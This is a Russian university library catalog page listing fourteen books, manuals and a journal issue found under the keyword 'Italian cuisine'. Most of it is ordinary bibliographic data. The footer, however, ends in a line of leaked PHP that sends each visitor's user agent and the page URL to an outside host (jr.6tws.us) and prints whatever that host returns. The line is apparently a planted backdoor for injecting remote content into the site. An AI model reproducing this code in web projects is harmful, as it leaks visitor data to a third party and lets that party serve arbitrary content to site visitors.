Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

310 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КУХНЯ ИТАЛЬЯНСКАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Титюнник А. И. Советская национальная и зарубежная кухня [Текст] : учеб. пособие для сред. проф.-техн. училищ / А. И. Титюнник, Ю. М. Новоженов, 1979. - 479 с.
Ключевые слова 
КУХНЯ РУССКАЯ -- КУХНЯ УКРАИНСКАЯ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ МОЛДАВСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КИРГИЗСКАЯ -- КУХНЯ ТАДЖИКСКАЯ -- КУХНЯ ТУРКМЕНСКАЯ -- КУХНЯ ЛИТОВСКАЯ -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ЭСТОНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АРАБСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ СКАНДИНАВСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЛАТИНО-АМЕРИКАНСКАЯ
Держатели документа (Информация об экземплярах) 
2. 
Сборник рецептур блюд зарубежной кухни [Текст] : сборник / Ассоциация кулинаров России ГО ВПО "Московский гос. ун-т пищевых производств", АНО ВПО ЦС РФ "Рос. ун-т кооперации", 2009. - 815 с.
Ключевые слова 
Кухня австралийская -- КУХНЯ АВСТРИЙСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АРАБСКАЯ -- Кухня афганская -- КУХНЯ АФРИКАНСКАЯ -- КУХНЯ БЕЛЬГИЙСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- Кухня вьетнамская -- КУХНЯ ГРЕЧЕСКАЯ -- КУХНЯ ДАТСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ ИНДОНЕЗИЙСКАЯ -- КУХНЯ ИРАНСКАЯ -- Кухня иракская -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ КАНАДСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- Кухня народов Антильских островов -- Кухня аргентинская -- Кухня боливийская -- КУХНЯ БРАЗИЛЬСКАЯ -- Кухня венесуэльская -- Кухня народов Гаити -- Кухня гватемальская -- Кухня народов Гондураса -- Кухня никарагуанская -- Кухня Коста-Рики -- Кухня панамская -- Кухня доминиканская -- Кухня колумбийская -- КУХНЯ КУБИНСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- Кухня парагвайская -- Кухня перуанская -- Кухня сальвадорская -- Кухня уругвайская -- Кухня чилийская -- Кухня эквадорская -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- Кухня португальская -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ СКАНДИНАВСКАЯ -- КУХНЯ ТУРЕЦКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ
Держатели документа (Информация об экземплярах) 
3. 
Новоженов Ю. М. Зарубежная кухня [Текст] : практ. пособие / Ю. М. Новоженов, Л. Н. Сопина, 1990. - 286 с.
Ключевые слова 
КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ чехословацкая -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АРАБСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ ИНДОКИТАЙСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ СКАНДИНАВСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ КАНАДСКАЯ -- КУХНЯ ЛАТИНО-АМЕРИКАНСКАЯ -- КУХНЯ КУБИНСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ БРАЗИЛЬСКАЯ -- КУХНЯ КОЛУМБИЙСКАЯ -- КУХНЯ АРГЕНТИНСКАЯ
Держатели документа (Информация об экземплярах) 
4. 
Официант-бармен [Текст] / сост. В. А. Барановский, 2013. - 427 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- РЕСТОРАН -- КАФЕ -- БАР -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА -- БУФЕТ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ОБСЛУЖИВАНИЕ ПОСЕТИТЕЛЕЙ -- КУЛЬТУРА ПОВЕДЕНИЯ ОФИЦИАНТА -- ВСТРЕЧА ПОСЕТИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- ПОДАЧА БЛЮД -- КОКТЕЙЛЬ -- ПУНШ -- ГЛИНТВЕЙН -- ГРОГ -- КРЮШОН -- САНГРИЯ -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- СПЕЦОБСЛУЖИВАНИЕ -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ АЛЖИРСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ КАНАДСКАЯ -- КУХНЯ АРАБСКАЯ -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- КУХНЯ ИНДОНЕЗИЙСКАЯ -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- ТЕХНИКА БЕЗОПАСНОСТИ - ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- ЭКЗАМЕН ТЕОРЕТИЧЕСКИЙ -- ЭКЗАМЕН ПРАКТИЧЕСКИЙ -- ОХРАНА ТРУДА -- САНПИН 2.3.2.1078-01 -- САНПИН 2.3.5.021-94 -- САНПИН 42-123-4117-86
Держатели документа (Информация об экземплярах) 
5. 
Питание и общество. - Журнал, 2010г. № 4
Оглавление 
  • Медведева, О. С заботой о детях / О. Медведева. - с.7
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Кожин, А. . Энергетические напитки: вредно или очень вредно? / А. . Кожин. - с.9
    Кл. слова: НАПИТОК ЭНЕРГЕТИЧЕСКИЙ
  • Шаулина, Л. Ресторанный рынок России: не плывем, но и не тонем / Л. Шаулина. - с.9
    Кл. слова: РЫНОК РЕСТОРАННЫХ УСЛУГ
  • Лазутина, В. I Чемпионат исламской кухни / В. Лазутина. - с.10-12
    Кл. слова: КУХНЯ исламская, ЧЕМПИОНАТ КУЛИНАРНОГО МАСТЕРСТВА
  • Лазутина, В. "Будем ждать новой встречи!" / В. Лазутина. - с.13-14
    Кл. слова: КОНКУРС ПРОФ МАСТЕРСТВА
  • Пасха. - с.17
    Кл. слова: КУХНЯ ГРЕЧЕСКАЯ
  • Из ягнятины. - с.18-19
    Кл. слова: БЛЮДА ИЗ ЯГНЯТИНЫ, МЯСО ягненка
  • Оформление мучных кондитерских изделий. - с.20-21
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, КАРАМЕЛЬ
  • Коцци, Л. Спагетти / Л. Коцци, О. Шмелева. - с.22
    Кл. слова: КУХНЯ ИТАЛЬЯНСКАЯ, Спагетти
  • Филонов, М. Плод долголетия - абрикос / М. Филонов. - с.23
    Кл. слова: Абрикос
  • "ПРОДЭКСПО - 2010". - с.24-25
    Кл. слова: ВЫСТАВКА продуктов питания, ПРОДУКТЫ ПИТАНИЯ
  • Троицкая, Е. Стейки - что мы о них знаем? / Е. Троицкая. - с.28-29
    Кл. слова: Стейки
6. 
Современная молочная кухня [Текст] / М. Теплы [и др.], 1987. - 240 с.
Держатели документа (Информация об экземплярах) 
7. 
Технология кулинарной продукции за рубежом [Текст] : учеб.-метод. пособие для студентов специальности 260501 "Технология продуктов общественного питания" / АНО ВПО "Омский экономический ин-т", каф. технологии продуктов питания, 2008. - 199 с.
Ключевые слова 
КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ УКРАИНСКАЯ -- КУХНЯ МОЛДАВСКАЯ -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ЛИТОВСКАЯ -- КУХНЯ ЭСТОНСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- Кухня латино-американская -- Кухня аргетинская -- Кухня бразильская -- КУХНЯ КУБИНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ АРАБСКАЯ -- Кухня индийская -- ПОЛНЫЙ ТЕКСТ
Держатели документа (Информация об экземплярах) 
8. 
Технология кулинарной продукции за рубежом [Текст] : лабораторный практикум для студентов специальности 260501 "Технология продуктов общественного питания" / АНО ВПО "Омский экономический ин-т", каф. технологии продуктов питания, 2008. - 51 с.
Держатели документа (Информация об экземплярах) 
9. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
10. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
11. 
Кузнецова Е. К. Лучшие рецепты мировой кухни [Текст] : издания для досуга / Е. К. Кузнецова, 2004. - 191 с.
Ключевые слова 
КУХНЯ АВСТРИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АРАБСКАЯ -- КУХНЯ АФРИКАНСКАЯ -- КУХНЯ БЕЛЬГИЙСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ГЕРМАНСКАЯ -- КУХНЯ ГОЛЛАНДСКАЯ -- КУХНЯ ГРЕЧЕСКАЯ -- КУХНЯ ИЗРАИЛЬСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ СКАНДИНАВСКАЯ -- КУХНЯ ТУРЕЦКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ШВЕЙЦАРСКАЯ -- КУХНЯ ЯПОНСКАЯ
Держатели документа (Информация об экземплярах) 
12. 
Могильный М. П. Организация и технология обслуживания питанием в гостиничных комплексах (рекомендации, перспективы, проектирование) [Текст] : производственно-практическое издание / М. П. Могильный, А. Ю. Баласанян, 2004. - 176 с.
Ключевые слова 
БАД -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- ХОЗЯЙСТВО ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- СЕРВИС -- VIP - обслуживание -- МЕНЮ -- ТУРИЗМ молодежный -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ ИНТУРИСТОВ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ -- Кухня арабская -- Кухня Юго-Восточной Азии -- Кухня кубинская -- Кухня стран Латинской Америки -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- КУХНЯ НАЦИОНАЛЬНАЯ -- День разгрузочный
Держатели документа (Информация об экземплярах) 
13. 
Радужан М. Ю. Курс бармена-официанта [Текст] / М. Ю. Радужан, И. Ю. Митева, 2005. - 220 с.
Держатели документа (Информация об экземплярах) 
14. 
Рецепты итальянской кухни [Видеозапись, кинофильм, микроформа] : [Видеофильм]. - 1 вк.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.11 с.14 запросов, 0.79c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;